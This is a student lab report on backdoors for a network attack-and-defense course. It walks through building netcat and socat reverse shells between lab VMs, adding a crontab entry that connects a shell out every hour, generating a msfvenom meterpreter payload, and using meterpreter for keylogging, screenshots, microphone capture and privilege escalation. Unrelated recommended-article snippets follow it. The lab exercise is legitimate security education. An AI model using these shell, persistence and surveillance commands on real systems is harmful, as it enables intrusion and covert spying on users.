Exp2 后门原理与实践 20154301仉鑫烨

最新推荐文章于 2024-08-26 11:09:39 发布
最新推荐文章于 2024-08-26 11:09:39 发布
阅读量183 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/z20154301/p/8669163.html
本文介绍了网络对抗实验的具体步骤,包括Windows与Linux系统间利用ncat和socat建立后门连接的方法,以及使用Meterpreter获取远程控制权限的过程。还探讨了记录键盘输入、截屏和音频等高级功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

20154301《网络对抗》Exp2 后门原理与实践

20154301仉鑫烨

一、实验内容
常用后门工具实践:
  • Windows获得Linux Shell:

  1. 在Windows下,先使用ipconfig指令查看win7虚拟机IP:
    1344257-20180329131308772-388112259.png

  2. 使用ncat.exe程序监听本机的4301端口:
    1344257-20180329131332088-1731213925.png

  3. Kali:使用nc指令的-e选项反向连接Windows主机的4301端口:
    1344257-20180329131337303-296106826.png

  4. Windows下成功获得了一个Kali的shell,运行ls指令如下:
    1344257-20180329131344027-459146667.png

  • Linux获得Windows Shell:

  1. 过程与之前的类似,在Kali环境下用ifconfig查看IP:
    1344257-20180329131350929-1492709909.png

  2. 使用nc指令监听4301端口:
    1344257-20180329131355632-1600541499.png

  3. 在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的4301端口:
    1344257-20180329131359120-831071948.png

  4. Kali下可以看到Windows的命令提示,可以输入Windows命令:
    1344257-20180329131402902-80014764.png

  • 使用nc传输数据:

  1. Windows下监听4301端口:
    1344257-20180329131406771-1269211883.png

  2. Kali下连接到Windows的4301端口:
    1344257-20180329131412401-566310973.png

  3. 建立连接之后,就可以传输数据了,这里传输的是字符串,相当于两台主机在聊天,也可以用重定向操作符来传输文件:
    1344257-20180329131421036-1078923689.png
    1344257-20180329131425194-275312044.png

  • 使用netcat获取主机操作Shell,cron启动

  1. 先在Windows系统下,监听4301端口:
    1344257-20180329131433250-962404792.png

  2. 在Kali环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。
    1344257-20180329131441534-1735387712.png

  3. crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:
    (最后一行为44 * * * * /bin/netcat 192.168.108.131 4301 -e /bin/sh,意思是在每个小时的第44分钟反向连接Windows主机的4301端口,此时时间为16:43)
    1344257-20180329131450671-1561038299.png

  4. 时间到16点44分,此时已经获得了Kali的shell,可以输入指令(如果在这之前输入指令,屏幕上不会有显示,但是等到了44分时会立马显示出来):
    1344257-20180329131454541-1686730494.png

  • 使用socat获取主机操作Shell, 任务计划启动
    基础知识:
     `socat`是`ncat`的增强版,它使用的格式是`socat [options] <address> <address>`,其中两个`address`是必选项,而`options` 是可选项。
`socat`的基本功能就是建立两个双向的字节流,数据就在其间传输,参数`address`就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

  1. 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
    1344257-20180329131502568-175118930.png

  2. 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4301 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口4301,同时把cmd.exe的stderr重定向到stdout上:
    1344257-20180329131507263-1052790800.png

  3. 创建完成之后,可以windows+L锁定计算机让它执行。
    1344257-20180329131512722-313958218.png

  4. 此时,在Kali环境下输入指令socat - tcp:192.168.108.131:4301,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的4301端口,此时可以发现已经成功获得了一个cmd shell:
    1344257-20180329131522049-404248669.png

  • 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  1. 输入指令
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=4301 -f exe > 20154301_backdoor.exe
    生成后门程序:
    1344257-20180329131607220-803245871.png

  2. 通过'nc'指令将生成的后门程序传送到Windows主机上:
    1344257-20180329131612162-883105358.png

  3. 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:use exploit/multi/handler set payload windows/meterpreter/reverse_tcp
    1344257-20180329131617517-476921566.png

  4. 设置完成后,执行监听:
    1344257-20180329131621206-1203845163.png

  5. 打开Windows上的后门程序:20154301_backdoor.exe
    1344257-20180329131626398-818413357.png

  6. 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
    1344257-20180329131640024-395418193.png

  • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  1. 使用record_mic指令截获一段音频:
    1344257-20180329131645312-1663808634.png

  2. 使用webcam_snap指令可以使用摄像头进行拍照:(电脑没有色相头!!)

  3. 使用screenshot指令可以进行截屏:
    1344257-20180329131721224-1400129723.png

  4. 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
    1344257-20180329131733635-1241744624.png
    1344257-20180329131738139-955035300.png

  5. 先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功:
    1344257-20180329131742623-1460814444.png

二、实验感想
  • 本次实验对我而言具有一定的难度,尤其是在一开始不清楚ip地址发生变化时,第四项实验内容始终不能通过,有些摸不到头脑。后查阅了曾林同学的博客,发现了解决办法,最终解决了问题。在进行实验的过程中,我对网络攻防有了更深的理解,加深了兴趣,尤其在后面记录对方按键记录、屏幕信息、打开摄像头的阶段,十分有趣。期待下一次免杀实验,希望能学会更加具有实际操作意义的攻防技术。
三、实验问题

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
    朋友盗号后给你发送文件。

  2. 例举你知道的后门如何启动起来(win及linux)的方式?
    按键启动。伴随打开软件启动。

  3. Meterpreter有哪些给你映像深刻的功能?
    记录按键记录、截屏、打开摄像头、录音等功能,可在被攻击方毫不知情的情况下泄露大量隐私,并产生信息安全风险

  4. 如何发现自己有系统有没有被安装后门?
    杀毒软件扫描

转载于:https://www.cnblogs.com/z20154301/p/8669163.html

加载chatglm3模型时出现ValueError: too many values to unpack (expected 2)的解决方案
weixin_43178406的博客
07-28 10万+
本文主要介绍了加载chatglm3模型时出现ValueError: too many values to unpack (expected 2)的解决方案,希望能对使用ChatGLM 3的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
mgr改造orchestrator
Du.的博客
03-29 556
背景 某项目现场三台主机有三套mgr集群,每台主机上3个实例(占用4301、4304、4308端口),将其中一套(4301端口)内存占用异常的mgr集群改造为orchestrator高可用集群架构 1、mgr整改成mysql增强半同步(三台主机操作) (1)keepalived配置文件修改 cp keepalived.conf keepalived.conf.bk vi keepalived.conf 删除检测4301进程和绑定4301相关vip的部分 (2)重启keepalived syst
实践经验】端口被占用问题:listen tcp:bind:only one usage of each socket address
小哎呀的博客
08-26 7754
可知,进程号1428是运行的svchost程序,说明之前运行的程序没有被杀死,继续占用端口。导致再运行项目的时候,显示端口被占用。经过搜索,确定是端口被占用,所以确定解决方法是查看端口是被什么程序占用了,是否可以需要杀死占用的程序还是更换端口。因为我的进程号9840显示没有程序,所以换个进程号1428进行演示。netstat -ano|findstr “端口号”taskkill /T /F /PID 进程号。tasklist|findstr “进程号”输入cmd,打开控制台。查看是否还有程序占用。
QQ快速登录协议分析以及风险反思
七夜的博客
08-22 6926
&#13;   前言 众所周知,Tencent以前使用Activex的方式实施QQ快速登录,现在快速登录已经不用控件了。那现在用了什么奇葩的方法做到Web和本地的应用程序交互呢?其实猜测一下,Web和本地应用进行交互可能采用http交互,事实也是如此。   快速登录分析 快速登陆框请求     https://xui.ptlogin2.qq.com/cgi-bin...
易语言-QQ快捷登录
06-25
最近要做个QQ群验证发现超文本浏览框无法检测到本机登陆的QQ,其他浏览器则可以包括IE,后来经过研究发现 localhost.ptlogin2.qq.com:4301 这个域名也就是负责返回本机登录QQ账号信息的,解析后的ip地址是 127.0.0.1 由此可见是QQ主程序在本地开启了一个4301端口的http服务器,可能QQ程序会检测向这个端口发送数据包的程序是否有数字签名或者特征码之类的具体是什么我还没研究出来,所以暂时解决方案有两个 1、注入启动,注入到QQ进程或者QQ音乐进程又或者浏览器进程 2、精易模块有一个 程序_内存中运行EXE () ,设置一个有数字签名的伪装程序来启动
查看端口被占用
大强博客
03-24 1万+
Microsoft Windows [版本 6.1.7601]版权所有 (c) 2009 Microsoft Corporation。保留所有权利。C:\Users\Administrator&gt;netstat -ano活动连接  协议  本地地址          外部地址        状态           PID  TCP    0.0.0.0:135            0.0....
20194311姜晨昊Exp2-后门原理实践
weixin_51927594的博客
03-28 1494
20194311姜晨昊Exp2-后门原理实践 实验基础 本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。 基础知识 后门的概念 后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。 常用后门工具 NC和Netcat 底层工具,进行基本的
20194307肖江宇Exp2后门原理实践
MYRLY的博客
03-28 3989
文章目录20194307肖江宇Exp-2后门原理实践1.实验基础1.1基础知识1.2常用后门工具NC和NetcatSoCat任何代理、转发等功能都可以用该工具实现。Meterpreter2.实验目标2.1实验环境3.实验过程3.1使用netcat获取主机操作Shell,cron启动**(1)在主机中获取虚拟机shell****(2)在虚拟机中获取主机shell****(3)在虚拟机中cron启动并在主机监听**3.2使用socat获取主机操作Shell,任务计划启动(1)在Windows获得Linux S
20194307肖江宇Exp3—免杀原理实践
MYRLY的博客
04-08 4914
文章目录Exp3-免杀原理实践1 基础问题回答1.1 杀软是如何检测出恶意代码的?1.2 免杀是做什么?1.3 免杀的基本方法有哪些?​1.4 开启杀软能绝对防止电脑中恶意代码吗?2 实验环境3 实践内容3.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件3.2 veil,加壳工具3.3 使用C + shellcode编程3.4 通过组合应用各种技术实现恶意代码免杀 Exp3-免杀原理实践 1 基础问题回答 1.1 杀软是如何检测出恶意代码的? 基于特征码进行检测: 杀毒软件的病
深入FFM原理实践
mmc2015的专栏
06-25 1万+
美团团队的不少文章都不错 http://tech.meituan.com/deep-understanding-of-ffm-principles-and-practices.html 自己实现了一把,用python,速度慢于台大的libffm,但效果更好。 几个注意点: 1)labelloss function之间的关系。。。 2)梯度计算时的 中间数据 预计
计算机网络端口的定义
jk110333的专栏
02-27 1万+
端口介绍 本文所述端口都是逻辑意义上的端口,是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。 我们这里将要介绍的就是逻辑意义上的端口。  A、按端口号分布划分      (1)知名端口(Well-Known Ports)     知名端口即众所周知的端口号,范围从0到1023,这些端口号一般固定
Exp8 web基础 20154301仉鑫烨
weixin_34257076的博客
05-17 81
20154301 Exp8 Web基础 仉鑫烨 一、 实践内容 Web前端:HTML基础 Web前端:javascipt基础 Web后端:MySQL基础 Web后端:PHP基础 SQL注入 XSS攻击测试 发帖和会话管理的实现 二、 基础问题 什么是表单? 答:①表单是一个包含表单元素的区域,表单元素是允许用户在表单中(比如:文本域、下拉列表、单选框、复选框等等)输入信息的元素,...
Exp9 Web安全基础 20154301仉鑫烨
weixin_33850890的博客
05-28 125
20154301 Exp9 Web安全基础 仉鑫烨 一、 实践内容 Cross-Site Scripting(XSS)练习 Injection Flaws练习 二、 基础问题 SQL注入攻击原理,如何防御? 答:①SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。②对于SQL注入攻击的防范,我觉得主要...
常见的端口号
Fly_鹏程万里
05-13 874
常见的端口号端口号名称注释21ftp文件传输协议端口22ssh安全Shell(SSH)服务23telnetTelnet服务25SMTP简单邮件传输协议53DNSDNS域名解析协议69TFTP小文件传输协议80http用于万维网服务的超文本传输协议443https安全超文本传输协议(http)1433SQLserverSql server服务器1521OracleOracle数据库3306MySQL...
Windows 查看端口
qq_34731859的博客
12-04 342
链接:http://www.cnblogs.com/lvxiuquan/archive/2012/08/22/2650507.html
Windows查看所有的端口及端口对应的程序
热门推荐
Hu_wen的专栏
12-21 8万+
步骤一、Windows查看所有的端口 点击电脑左下角的开始,然后选择运行选项,接着我们在弹出的窗口中,输入【cmd】命令,进行命令提示符。然后我们在窗口中输入【netstat -ano】按下回车,即会显示所有的端口占用情况。如图所示:   步骤二、查询指定的端口占用 在窗口中,继续输入【netstat -aon|findstr "提示的端口"】,例如提示的端口为9088,那么就输入命令...
linux常用端口对照
joan的专栏
10-25 1883
linux常用端口对照 著名端口 1 tcpmux TCP 端口服务多路复用 5 rje 远程作业入口 7 echo Echo 服务 9 discard 用于连接测试的空服务 11 systat 用于列举连接了的端口的系统状态 13 daytime 给请求主机发送日期和时间 17 qotd 给连接了的主机发送每日格言 18 msp 消息发送协议 19 chargen 字符生成服务;发送无止境...
接口测试返回值验证方式---返回值为json长串
12-10 9790
1.返回值 2.验证方式: public void check200_N(Object obj, int ret_num) throws UnsupportedEncodingException, Exception { JSONObject resultJson = JSONObject.fromObject(obj); Assertions.assertThat(
转化问题学生的六种激励法.doc
最新发布
08-10
转化问题学生的六种激励法.doc
MSP430G2单片机实战教程: Launchpad开发板嵌入式系统
"MSP430G2系列单片机原理实践教程" 本教程主要围绕MSP430G2系列单片机展开,旨在提供一个理论实践相结合的学习平台。MSP430G2是德州仪器(TI)推出的一款高效能、低功耗的16位单片机,它在保持MSP430家族超低...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值